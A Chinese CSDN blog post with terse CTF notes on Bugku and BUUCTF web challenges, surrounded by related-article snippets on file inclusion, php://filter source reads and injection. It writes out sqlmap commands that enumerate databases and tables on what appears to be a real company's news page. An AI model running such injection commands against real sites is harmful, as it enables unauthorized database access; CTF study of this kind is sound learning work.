bugku web进阶。。buuctf web

最新推荐文章于 2022-10-20 22:28:55 发布
最新推荐文章于 2022-10-20 22:28:55 发布
阅读量435 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gudugeji/article/details/103994743
版权

1 phpcmsv9
御剑扫描,访问.txt的网址,发现flag
在这里插入图片描述
在这里插入图片描述
2.bugku_cms1
…扫描不出来。。
在这里插入图片描述
3 实战2-注入
aboutnews里存在注入点
sqlmap爆表
包数据库sqlmap.py -u http://www.kabelindo.co.id/readnews.php?id=28 --dbs
爆指定数据库sqlmap.py -u http://www.kabelindo.co.id/readnews.php?id=28 -D u9897uwx_kabel --tables
得到flag在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

另:sql使用教程:https://www.jianshu.com/p/65d7522ecc1f
https://blog.csdn.net/qq_33530840/article/details/82144515

buuctf
1 easy_tornado分别打开

在这里插入图片描述在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述

咕嘟咯叽
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BugkuCTF-WEB进阶
Alita_lxz的博客
11-10 336
BugkuCTF-WEB进阶-第1题到第11题
bugkuctf解题-WEB
05-04
本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验分享,深入探讨Web解题的关键知识点。 首先,我们需要理解Web安全的基础概念。Web应用是基于HTTP/HTTPS协议的,其安全性主要取决于服务器端...
文件包含总结
weixin_63289925的博客
03-23 2755
文件包含漏洞:通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入, 类型一:php伪协议(php://filter语句) php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行。从而导致 任意文件读取。 ...
CTFHUB web进阶学习
Je3Z的博客
09-12 1218
CTFHub之web进阶学习 Linux 动态加载器 ctfhub 动态加载器 linux–>ldd命令的介绍 就是没有x执行程序的权限,然后我们要执行/readflag来拿到flag,这里就用到了linux动态库链接器/加载器ld-linux.so.2 这里我们直接ldd /readflag 列出所需要得动态链接库 然后再/lib64/ld-linux-x86-64.so.2 /readflag 即可获取flag php Bypass disable_function LD_PRELOAD Linu
Bugku CTF 每日一题 旋转跳跃 BUUCTF 九连环
彼岸花苏陌的博客
02-17 3449
旋转跳跃 打开题发现是段音频,结合key:syclovergeek,猜测这个key应该是秘钥,音频隐写然后要秘钥的,那就应该是mp3stego 所以将MP3丢到mp3stego目录下,然后cmd进入该目录,用秘钥输入如下命令 即可得到txt文件,打开就是flag BUUCTF 九连环 打开发现是张图片,用winhex打开发现最后面有异样,应该有zip 用foremost分离出一个zip文件 但是发现解压后里面有个图片文件损坏了,而且另一个是zip包,还要密码才能进入 winhex打开zip包发现不是伪加密
BUUCTF--[N1CTF 2018]eating_cms
qq_46263951的博客
07-26 318
利用伪协议读取源码/user.php?page=php://filter/convert.base64-encode/resource=user <?php require_once("function.php"); if( !isset( $_SESSION['user'] )){ Header("Location: index.php"); } if($_SESSION['isadmin'] === '1'){ $oper_you_can_do = $OPERATE_adm.
bugku题的web类解析
01-29
这个是我自习写的bugkuweb的解析,其中四个题因为各种原因没有做出来,分别为welcome to bugku,孙xx的博客,login2,login4。也许有写的不好的地方,见谅,
web留言板
06-06
Web留言板 (0分) 设计一个简单的基于Web的留言板,要求如下:1)系统中所有页面,如果用户没登录,则让用户返回到登录页面login.jsp(说明:login.jsp页面填写用户的用户名和密码);2)留言板(message.jsp)页面中...
bugku web题INSERT INTO注入.docx
05-16
bugku web题INSERT INTO注入 明确注入点,是走的http报头的x-forwarded-for。  我尝试了bool型注入,发现自己构造的语句在自己数据库中会报错,但是这里并没有错误报告,因此考虑基于时间的盲注
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 Bugku-Web-cookie欺骗是指通过构造Cookie欺骗服务器,获取敏感信息或控制服务器行为的一种攻击方式。本文将详细介绍Bugku-Web-cookie欺骗的原理、攻击过程和防御方法。 原理 在Web应用程序...
BUUCTF--[GKCTF 2021]easycms
qq_46263951的博客
07-12 960
首先我们进入页面后发现有登录和注册,点击后并没有任何反应,所给出的页面没有可以利用点,接下来使用御剑工具进行扫描 发现有个后台,根据提示后台密码5位弱口令, 猜测用户名和密码为:admin/12345,成功进入后台 也可使用admin/admin,demo/demo 设计-->导出主题-->信息随便填 通过以上操作我们可以找到下载的链接 目录部分经过base64解码 经过一些盲猜后发现目录直接改为flag(base64)即可,最终下载地址为 h...
CTFweb入门(持续更新…)
qq_41046545的博客
10-20 1979
web入门
BugKu Web进阶
AlexYoung28的博客
08-25 2123
哇,总算做到进阶题目来了,希望我这个菜鸡还可以多做几道题吧!加油 phpcmsV9 看到这个题目,看起来是一个已经存在的漏洞,赶快搜一搜,结果,还真有这个漏洞,然后大致看了一下。 但是这个网页是不是太简陋了,感觉没有什么注入点呀。 好吧,还是 扫描器扫一扫。 结果发现了 robots.txt, 看一下,结果就没有结果了。 当然,这里好像是因为这道题靶机被人破坏了吧,我进入这道题的主页...
bugkuweb进阶 wp)
Xi4or0uji
09-02 2537
phpcmsv9 这题叫道理应该是考phpcmsv9的漏洞的,但是挂了,连注册都注册不了....... 不过有个非预期解,访问一个robots.txt居然就看到flag了,交一发还是对的....... 正确的解法应该是找到注册页面 填写了以后在post数据最后加一句&amp;info[content]=&lt;img src=http://www.bugku.com/tools/phpyi...
BugkuCTF-web进阶-实战2-注入 writeup
会下雪的晴天
07-14 1452
题目描述 解题传送门:http://www.kabelindo.co.id/ 解题思路 打开链接后得到个这个页面,注入,,,我一开始在搜索框内随意试试,发现没什么用,抓包也没啥结果。然后就逛逛这个网站看看哪里有注入点,找了一会,在页面的About-News里面发现数字型注入,话不多说,开始 注入嘛,老套路,两种方法 法一、手工注入 猜字段http://www.kabelindo.co....
BugkuCTF——web篇writeup(持续更新)
过客璇璇的博客
03-23 6万+
BugkuCTF——web篇writeup 平台网址:http://ctf.bugku.com/ 平台首页: web2 网址链接:http://120.24.86.145:8002/web2/ 页面: 一看只有好多滑稽,分数也不太高,应该不是很难,F12打开开发者工具看一下 得到ctf:flag KEY{Web-2-bugKssNNikls9100} 文件上传测试 链...
BUGKU(WEB进阶)-phpcmsV9
tothemoon的博客
11-16 380
拿到一个题目后最基本的:查看网站里面有没有其他页面。 比如查看flag.txt,robots.txt,index.php.bak。 这道题查看robots.txt就可以直接看到flag了。 提交了一下居然是对的。 可能这道题已经被大佬们玩坏了吧,不知到正确的做法是怎样的。 ...
CTF web总结
热门推荐
giantbranch的专栏
04-09 7万+
欢迎光顾我的新博客:https://www.giantbranch.cn 本文链接:http://blog.csdn.net/u012763794/article/details/50959166 本文根据自己的做题经验及各大练习平台不断更新,若我最近懒了,没怎么更新,请在下面提醒我或鼓励我 仅作为自己的笔记及刚入门的童鞋,大牛勿喷 基础篇   1.直接查看源代码   http:/...
BUGKU web进阶1
weixin_45689999的博客
02-22 208
phpcmsV9 提示说在txt里,御剑扫描后台 发现txt,双击得到flag
9-杂项题目练习(六)
最新发布
10-05
2. **Web漏洞**:这一题考察的是Web安全防护的漏洞检测。通过Python脚本分析服务器的日志文件(access.log),查找特定模式(如"flag"关键字后面紧跟一个非法字符序列),然后解码获取机密信息。这涉及到HTTP协议...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值